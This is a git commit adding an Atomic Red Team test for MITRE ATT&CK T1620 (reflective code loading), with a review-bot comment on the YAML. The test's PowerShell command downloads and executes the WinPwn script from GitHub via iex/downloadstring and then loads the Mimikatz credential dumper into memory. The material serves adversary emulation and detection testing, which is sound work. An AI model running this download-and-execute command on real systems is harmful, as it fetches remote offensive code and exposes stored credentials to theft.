T1620 - Reflective Code Loading (#1959)

* Create T1620.yaml

* Update T1620.yaml

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
tlor89
2022-05-12 17:44:05 -05:00
committed by GitHub
parent 0a82610b35
commit e7d9f85159
@@ -0,0 +1,13 @@
attack_technique: T1620
display_name: "Reflective Code Loading"
atomic_tests:
- name: WinPwn - Reflectively load Mimik@tz into memory
description: Reflectively load Mimik@tz into memory technique via function of WinPwn
supported_platforms:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
mimiload -consoleoutput -noninteractive
name: powershell
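Review bot: In the executor `command`, `$S3cur3Th1sSh1t_repo` is assigned but never referenced by the two lines that follow, and it points at the account root with no revision, while the `downloadstring` URL is pinned to commit 121dcee26a7aca368821563cbe92b2b5638c5773. If WinPwn.ps1 reads that variable to fetch further content, say so in the description and note that those fetches are not pinned to a reviewed revision; if it does not, drop the assignment. The test also declares no `cleanup_command`, no `elevation_required` and no `dependencies` entry for the outbound network access it relies on, and the `description` only restates the `name`. A sentence on what the test is expected to leave on the host would help whoever validates detections against it.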